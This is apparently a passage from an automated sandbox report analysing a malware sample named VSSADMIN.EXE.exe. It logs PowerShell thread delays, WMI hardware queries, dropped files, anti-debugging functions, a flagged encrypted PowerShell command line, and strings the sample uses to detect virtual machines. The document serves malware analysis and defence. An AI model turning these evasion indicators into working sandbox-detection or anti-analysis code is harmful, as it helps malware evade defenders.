              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep count: 7602 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152Thread sleep count: 1813 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5724Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep count: 7400 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164Thread sleep count: 1939 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5712Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6940Thread sleep count: 3406 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6940Thread sleep count: 1109 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6936Thread sleep time: -9223372036854770s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6956Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6916Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6944Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5732Thread sleep count: 3538 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7140Thread sleep count: 1963 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7028Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7024Thread sleep count: 3602 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4996Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6932Thread sleep count: 663 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080Thread sleep count: 1769 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080Thread sleep count: 1516 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5316Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964Thread sleep count: 2819 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6928Thread sleep count: 394 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7602Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1813Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7400Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1939Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3406
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1109
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2837
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1332
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3538
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1963
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3602
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 663
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1769
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1516
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2819
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 394
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeAPI coverage: 5.8 %
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.dllJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68562\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FBF4246 rdtsc 1_2_00007FFD3FBF4246
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFBE7143 sldt word ptr [eax]8_2_00007FFCDFBE7143
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer`
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwarec
              Source: rar.exe, 0000003B.00000003.227944393.000002A7EDA83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware@
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc!
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D15A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray@
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C86744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C86744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C77850 FindFirstFileExW,FindClose,0_2_00007FF614C77850
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C909E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF614C909E4
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C86744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,1_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C86744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,1_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C77850 FindFirstFileExW,FindClose,1_2_00007FF614C77850
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C909E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF614C909E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE7546EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,59_2_00007FF6EE7546EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE7988E0 FindFirstFileExA,59_2_00007FF6EE7988E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE74E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,59_2_00007FF6EE74E21C

              Anti Debugging

              barindex
              Potentially malicious time measurement code found
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FBF42461_2_00007FFD3FBF4246
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FBF57311_2_00007FFD3FBF5731
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FF45510 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFD3FF45510
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C7B6CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF614C7B6CC
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C925D0 GetProcessHeap,0_2_00007FF614C925D0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FBF4246 rdtsc 1_2_00007FFD3FBF4246
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C7B1B0 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,0_2_00007FF614C7B1B0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C7AE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF614C7AE30
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C7B6CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF614C7B6CC
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C7B8B0 SetUnhandledExceptionFilter,0_2_00007FF614C7B8B0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C89B14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF614C89B14
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C7B1B0 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,1_2_00007FF614C7B1B0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C7AE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF614C7AE30
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C7B6CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF614C7B6CC
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C7B8B0 SetUnhandledExceptionFilter,1_2_00007FF614C7B8B0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C89B14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF614C89B14
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FBF5A24 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFD3FBF5A24
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE78B0E0 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,59_2_00007FF6EE78B0E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE794C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_00007FF6EE794C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE78B6D8 SetUnhandledExceptionFilter,59_2_00007FF6EE78B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE78A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,59_2_00007FF6EE78A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE78B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_00007FF6EE78B52C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Encrypted powershell cmdline option found
